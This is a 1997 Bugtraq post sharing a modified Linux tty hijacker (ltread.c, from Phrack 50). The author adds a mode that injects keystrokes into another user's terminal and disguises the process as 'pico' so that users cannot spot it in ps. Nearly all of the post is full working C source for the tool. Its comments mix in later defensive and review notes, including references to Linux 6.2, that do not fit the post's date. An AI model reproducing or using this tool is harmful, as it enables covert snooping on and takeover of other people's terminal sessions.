
Bugtraq mailing list archives

Handy change I made in ltread.c
From: bugtraq () DRAGO NWS NET (Nathan D. Faber)
Date: Tue, 15 Apr 1997 15:51:04 -0400


I found myself always writing in my users tty's by accident when I forgot
to close the snooper, this is the best tty hijacker ive seen so I figured
I would make a few modifications in it for my personal use and I thought
maybe other people would find it handy.

Things I added/changed:
-Control mode (basically takeover mode, but I changed the key simply because
CTRL-X is a function key used in a lot of programs; ` activates control
mode now).
-Beep signal when typing in non-control mode (wont be sent to
tty).
-Pretty colors (humpf? just so I could easily tell what mode is on)
-Changed argv[0] to "pico" (so users cant catch ya in a ps), also changed
argv[1] to "      "(6 white spaces), so unless your initial executed file
is longer than "pico" the process should be hidden as "pico".
-------------------------------------------------------------------------
I also found this strange:
root      4927 99.9  1.1   860   264   1 R   15:49   0:02 pico
               ^^^^
seems to run fine though.  here is the modified ltread.c
-------------------------------------------------------------------------


<++> linspy/ltread.c
/*Modified by Nathan D. Faber
Drago () Drago com
Modified from ltread.c in Phrack Issue 50 - (P50-05)
[Giving credit where its due.]
*/
/*           .oO Phrack 50 Oo.
          Volume Seven, Issue Fifty
                  5 of 16
 ============================================
 Abuse of the Linux Kernel for Fun and Profit
          halflife () infonexus com
           [guild  corporation]
 ============================================*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <termios.h>
#include <string.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>
/* Terminal settings captured by tty_cbreak() so cleanup_atexit() can restore them. */
struct termios save_termios;
/* Descriptor whose settings were saved; stays -1 until tty_cbreak() succeeds. */
int ttysavefd = -1;
/* Descriptor for DEVICE_NAME: opened in do_ioctl(), then read and ioctl'd from main(). */
int fd;

/* Character device this reader talks to; can be overridden at build time.
 * The driver behind it is not part of this file. */
#ifndef DEVICE_NAME
#define DEVICE_NAME "/dev/ltap"
#endif

/* ioctl request numbers passed to the DEVICE_NAME descriptor. In this file
 * LS_SETMAJOR/LS_SETMINOR carry the major/minor number of the selected tty
 * and LS_TOGGLE is issued whenever control mode is switched. How the driver
 * acts on them is not visible here. */
#define LS_SETMAJOR     0
#define LS_SETMINOR     1

/* LS_FLUSHBUF is defined but never used in this file. */
#define LS_FLUSHBUF     2
#define LS_TOGGLE       3

/*
 * Queue one byte on the terminal behind `fd` with the TIOCSTI ioctl, so that
 * whatever reads that terminal receives it as if it had been typed there.
 *
 * The ioctl result is discarded, so a rejected request goes unnoticed.
 *
 * Defensive note: TIOCSTI is the input-injection primitive this program
 * depends on. Linux 6.2 and later can restrict it to CAP_SYS_ADMIN holders
 * (CONFIG_LEGACY_TIOCSTI=n or sysctl dev.tty.legacy_tiocsti=0), and auditing
 * ioctl calls that carry this request surfaces its use.
 */
void stuff_keystroke(int fd, char key)
{
   char injected = key;

   ioctl(fd, TIOCSTI, &injected);
}

/*
 * Switch the terminal on `fd` to unechoed, non-canonical input with
 * VMIN = 0 and VTIME = 0.
 *
 * The settings in force beforehand are stored in the global save_termios,
 * and ttysavefd is set to `fd` once the new settings have been applied, so
 * that cleanup_atexit() can put them back.
 *
 * Returns 0 on success, -1 if tcgetattr() or tcsetattr() fails.
 */
int tty_cbreak(int fd)
{
   struct termios raw;

   if(tcgetattr(fd, &save_termios) < 0)
      return -1;

   /* Start from the saved settings and change only what is needed. */
   raw = save_termios;
   raw.c_cc[VTIME] = 0;
   raw.c_cc[VMIN] = 0;
   raw.c_lflag &= ~ECHO;
   raw.c_lflag &= ~ICANON;

   if(tcsetattr(fd, TCSAFLUSH, &raw) >= 0)
   {
      /* Only a successful switch is recorded for later restoration. */
      ttysavefd = fd;
      return 0;
   }
   return -1;
}

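 /*
  * Resolve a tty name to a device path and confirm that it is a terminal.
  *
  * basedevice: an absolute path (leading '/'), or a name taken relative
  *             to /dev.
  *
  * Returns a pointer to a static buffer holding the path (overwritten by the
  * next call), or NULL when the name is NULL or longer than 128 bytes, the
  * device cannot be opened read-only, or the opened descriptor is not a tty.
  */
char *get_device(char *basedevice)
{
   static char devname[1024];
   int fd;

   if(basedevice == NULL) return NULL;
   if(strlen(basedevice) > 128) return NULL;

   /* The length check above keeps both forms well inside devname; snprintf
    * makes that bound explicit instead of relying on it. */
   if(basedevice[0] == '/')
      snprintf(devname, sizeof devname, "%s", basedevice);
   else
      snprintf(devname, sizeof devname, "/dev/%s", basedevice);

   fd = open(devname, O_RDONLY);
   if(fd < 0) return NULL;
   if(!isatty(fd))
   {
      /* The original returned here without closing, leaking the descriptor. */
      close(fd);
      return NULL;
   }
   close(fd);
   return devname;
}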


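/*
 * Hand the device numbers of the terminal at `device` to the DEVICE_NAME
 * driver.
 *
 * stat()s `device`, opens DEVICE_NAME read-only into the global `fd`, then
 * passes the major and minor numbers of st_rdev through the LS_SETMAJOR and
 * LS_SETMINOR ioctls. What the driver does with them is not visible here.
 *
 * Returns 0 on success, -1 if stat(), open() or either ioctl fails. On an
 * ioctl failure the global `fd` is left open; the only caller exits.
 */
int do_ioctl(char *device)
{
   struct stat mystat;

   if(stat(device, &mystat) < 0) return -1;
   fd = open(DEVICE_NAME, O_RDONLY);
   if(fd < 0) return -1;
   if(ioctl(fd, LS_SETMAJOR, major(mystat.st_rdev)) < 0) return -1;
   if(ioctl(fd, LS_SETMINOR, minor(mystat.st_rdev)) < 0) return -1;
   /* The original fell off the end of a non-void function, so the value
    * the caller compares against 0 was undefined. */
   return 0;
}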


/*
 * SIGINT handler: ends the process through exit(), using the signal number
 * as the exit status. Going through exit() means handlers registered with
 * atexit() still run.
 *
 * NOTE(review): exit() is not async-signal-safe (CERT SIG30-C); it is kept
 * here because the terminal restoration depends on the atexit handler.
 */
void sigint_handler(int s)
{
   const int status = s;

   exit(status);
}

/*
 * Exit hook: prints a line holding a single space, then restores the
 * terminal settings saved by tty_cbreak(), if any were saved.
 */
void cleanup_atexit(void)
{
   puts(" ");

   /* ttysavefd stays negative until tty_cbreak() has changed a terminal. */
   if(ttysavefd < 0)
      return;

   tcsetattr(ttysavefd, TCSAFLUSH, &save_termios);
}

/*
 * Entry point, invoked with one argument: the name of the tty to attach to.
 *
 * Flow as written: validate the tty argument with get_device(), overwrite
 * argv[0] and argv[1] in place, put stdin into unechoed non-canonical mode,
 * pass the tty's device numbers to the DEVICE_NAME driver via do_ioctl(),
 * then loop forever copying bytes read from the driver to stdout. A
 * backquote typed on stdin flips "control mode"; while it is on, every other
 * byte typed is pushed into the target tty with stuff_keystroke(), and while
 * it is off a typed byte only rings the local bell.
 *
 * Notes for reviewers and responders:
 *  - The argv rewrite changes only the argument strings that ps-style tools
 *    display. /proc/<pid>/exe and /proc/<pid>/comm are maintained by the
 *    kernel and are not affected, so comparing them with the displayed
 *    command line exposes the mismatch.
 *  - Every failure path calls exit(0), so the exit status never signals an
 *    error.
 *  - main has no declared return type (implicit int), which C99 removed.
 */
main(int argc, char **argv)
{
   int my_tty;
   char *devname;
    unsigned char ch;
   int i;
   /* x is the control-mode flag: 0 = watch only, 1 = typed bytes are injected. */
   int x=0;
   char count[]="      ";
   if(argc != 2)
   {
      fprintf(stderr, "%s ttyname\n", argv[0]);
      fprintf(stderr, "ttyname should NOT be your current tty!\n");
      exit(0);
   }
   /* devname points at get_device()'s static buffer, so the argv rewrite
    * below does not disturb it. */
   devname = get_device(argv[1]);
   /* NOTE(review): both copies write a fixed number of bytes (5 and 7,
    * counting the terminator) into the original argument storage without
    * checking how long those strings were. */
        strcpy(argv[0],"pico");
        strcpy(argv[1],count);
   if(devname == NULL)
   {
      perror("get_device");
      exit(0);
   }
   if(tty_cbreak(0) < 0)
   {
      perror("tty_cbreak");
      exit(0);
   }
   /* Registered only after tty_cbreak() succeeded, so every later exit path
    * restores the operator's terminal. */
   atexit(cleanup_atexit);
   signal(SIGINT, sigint_handler);
   if(do_ioctl(devname) < 0)
   {
      perror("do_ioctl");
      exit(0);
   }
   my_tty = open(devname, O_RDWR);
   if(my_tty == -1) exit(0);
   setvbuf(stdout, NULL, _IONBF, 0);
   /* The "[0m", "[2J", ... fragments in the banner strings are presumably
    * ANSI escape sequences whose ESC bytes were lost in archiving -- TODO
    * confirm against the Phrack original. */
   printf(" [0m [2J [1;1H [1;25;37;40m[ [31mnow monitoring session [37m] [0m\n\a");
   /* NOTE(review): stdin was set to VMIN=0/VTIME=0 by tty_cbreak(), so the
    * first read below returns at once when nothing is typed. No blocking call
    * is visible in the loop, which looks like a busy poll and would match the
    * 99.9% CPU figure the author reports; whether read() on the driver
    * descriptor blocks cannot be told from this file. */
 while(1)
   {
      i = read(0, &ch, 1);
      if(i > 0)
      {
         if(ch == '`')
         {
      /* Backquote flips control mode; LS_TOGGLE is sent to the driver on
       * both transitions. */
      if (x==0){
           printf(" [1m[ [34mControl mode on [37m] [34m  [0m\a\n");
           ioctl(fd, LS_TOGGLE, 0);
           x=1;
                 }
      else{
        printf(" [1m[ [34mControl mode off [37m] [34m  [0m\a\n");
        ioctl(fd, LS_TOGGLE, 0);
        x=0;
        }
          }
       else{
          /* Any other byte: injected into the target tty in control mode,
           * otherwise answered with a local bell and dropped. */
          if (x==1){
                stuff_keystroke(my_tty,ch);}
        else{
        printf("\a");}}
        }
      /* Copy one byte from the driver to the operator's screen. */
      i = read(fd, &ch, 1);
      if(i > 0)
         putchar(ch);
    }
}
<--> end ltread.c


